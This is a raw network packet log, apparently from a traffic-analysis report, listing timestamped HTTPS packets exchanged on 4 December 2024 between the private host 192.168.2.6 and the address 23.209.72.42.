                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:34.774142027 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:34.774297953 CET65093443192.168.2.623.209.72.42
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:34.803627968 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:34.803642988 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:34.803656101 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:34.803865910 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:34.803884983 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:34.803896904 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:34.803909063 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:34.804501057 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:34.804512978 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:34.804523945 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:34.804534912 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:34.804547071 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:34.804558039 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:34.804845095 CET65093443192.168.2.623.209.72.42
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:34.805474043 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:34.805488110 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:34.805497885 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:34.805510998 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:34.805522919 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:34.805536032 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:34.805547953 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:34.805758953 CET65093443192.168.2.623.209.72.42
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:34.827081919 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:34.827235937 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:34.827248096 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:34.827408075 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:34.827610016 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:34.827620983 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:34.827631950 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:34.827644110 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:34.828219891 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:34.828231096 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:34.828243017 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:34.828254938 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:34.828265905 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:34.828277111 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:34.828578949 CET65093443192.168.2.623.209.72.42
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:34.829106092 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:34.829118013 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:34.829128981 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:34.829139948 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:34.829153061 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:34.829164982 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:34.829395056 CET65093443192.168.2.623.209.72.42
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:34.843152046 CET4435497523.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:34.845146894 CET4435497523.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:34.845159054 CET4435497523.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:34.845431089 CET54975443192.168.2.623.209.72.42
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:34.854604006 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:34.854801893 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:34.854908943 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:34.854921103 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:34.855246067 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:34.855257988 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:34.855268002 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:34.855281115 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:34.855799913 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:34.855813980 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:34.856116056 CET65093443192.168.2.623.209.72.42
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:34.859287024 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:34.859364986 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:34.859378099 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:34.859679937 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:34.859690905 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:34.859703064 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:34.860070944 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:34.875871897 CET4435497523.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:34.875982046 CET4435497523.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:34.876081944 CET4435497523.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:34.876318932 CET54975443192.168.2.623.209.72.42
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:34.876461029 CET54975443192.168.2.623.209.72.42
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:34.884485006 CET4435497523.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:34.884661913 CET4435497523.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:34.884727955 CET4435497523.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:34.884738922 CET4435497523.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:34.884821892 CET54975443192.168.2.623.209.72.42
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:34.884881973 CET54975443192.168.2.623.209.72.42
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:34.885145903 CET65093443192.168.2.623.209.72.42
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:34.925544977 CET54975443192.168.2.623.209.72.42
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:35.009161949 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:35.073915958 CET65093443192.168.2.623.209.72.42
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:35.233829021 CET4435497523.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:35.395354033 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:35.405886889 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:35.405904055 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:35.406044960 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:35.406055927 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:35.406064987 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:35.406256914 CET65093443192.168.2.623.209.72.42
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:35.417373896 CET65093443192.168.2.623.209.72.42
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:35.746397018 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:35.755598068 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:35.755615950 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:35.755690098 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:35.755702972 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:35.755963087 CET65093443192.168.2.623.209.72.42
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:35.755985022 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:35.755996943 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:35.756006956 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:35.776148081 CET65093443192.168.2.623.209.72.42
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:36.098210096 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:36.113116980 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:36.113493919 CET65093443192.168.2.623.209.72.42
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:36.113675117 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:36.113845110 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:36.113990068 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:36.114002943 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:36.114367962 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:36.114379883 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:36.114391088 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:36.114403963 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:36.115119934 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:36.115133047 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:36.115144014 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:36.115156889 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:36.115642071 CET65093443192.168.2.623.209.72.42
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:36.115928888 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:36.115942955 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:36.115955114 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:36.115967035 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:36.116682053 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:36.116697073 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:36.130902052 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:36.131058931 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:36.131072998 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:36.131273031 CET65093443192.168.2.623.209.72.42
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:36.131333113 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:36.131351948 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:36.131365061 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:36.131942034 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:36.131953955 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:36.131964922 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:36.131978035 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:36.156869888 CET65093443192.168.2.623.209.72.42
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:36.159528017 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:36.159571886 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:36.159584999 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:36.159921885 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:36.159943104 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:36.159955978 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:36.159969091 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:36.160710096 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:36.160722017 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:36.160733938 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:36.160747051 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:36.160911083 CET65093443192.168.2.623.209.72.42
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:36.161524057 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:36.161535978 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:36.161545038 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:36.161556005 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:36.162329912 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:36.162342072 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:36.162350893 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:36.162362099 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:36.162372112 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:36.162512064 CET65093443192.168.2.623.209.72.42
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:36.174945116 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:36.174969912 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:36.174983025 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:36.175329924 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:36.175354958 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:36.175367117 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:36.175379038 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:36.176076889 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:36.176089048 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:36.176105022 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:36.176328897 CET65093443192.168.2.623.209.72.42
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:36.187288046 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:36.220330954 CET65093443192.168.2.623.209.72.42
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:36.225876093 CET65093443192.168.2.623.209.72.42
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:36.456155062 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:36.544660091 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:36.558275938 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:36.558527946 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:36.558651924 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:36.558680058 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:36.558747053 CET65093443192.168.2.623.209.72.42
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:36.558944941 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:36.558957100 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:36.558969021 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:36.558983088 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:36.559458017 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:36.559468031 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:36.572725058 CET65093443192.168.2.623.209.72.42
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:36.896378994 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:36.912266016 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:36.912447929 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:36.912571907 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:36.912584066 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:36.912863970 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:36.912877083 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:36.912888050 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:36.912900925 CET65093443192.168.2.623.209.72.42
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:36.913304090 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:36.913315058 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:36.913326025 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:36.913340092 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:36.913351059 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:36.913803101 CET65093443192.168.2.623.209.72.42
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:36.927602053 CET65093443192.168.2.623.209.72.42
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:37.246160030 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:37.253031969 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:37.253223896 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:37.253415108 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:37.253413916 CET65093443192.168.2.623.209.72.42
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:37.253523111 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:37.253534079 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:37.253801107 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:37.253973961 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:37.253987074 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:37.254271984 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:37.254283905 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:37.254293919 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:37.254306078 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:37.254908085 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:37.254920006 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:37.254933119 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:37.254940987 CET65093443192.168.2.623.209.72.42
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:37.254945993 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:37.254959106 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:37.254968882 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:37.255692959 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:37.273190975 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:37.273307085 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:37.273318052 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:37.273518085 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:37.273529053 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:37.273529053 CET65093443192.168.2.623.209.72.42
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:37.273540974 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:37.273555040 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:37.274100065 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:37.274111032 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:37.274122000 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:37.280244112 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:37.280309916 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:37.280323982 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:37.280636072 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:37.280647993 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:37.280658007 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:37.280670881 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:37.280787945 CET65093443192.168.2.623.209.72.42
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:37.281208992 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:37.281219959 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:37.281232119 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:37.297210932 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:37.297341108 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:37.297353029 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:37.297561884 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:37.297573090 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:37.297583103 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:37.297586918 CET65093443192.168.2.623.209.72.42
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:37.297964096 CET4436509323.209.72.42192.168.2.6
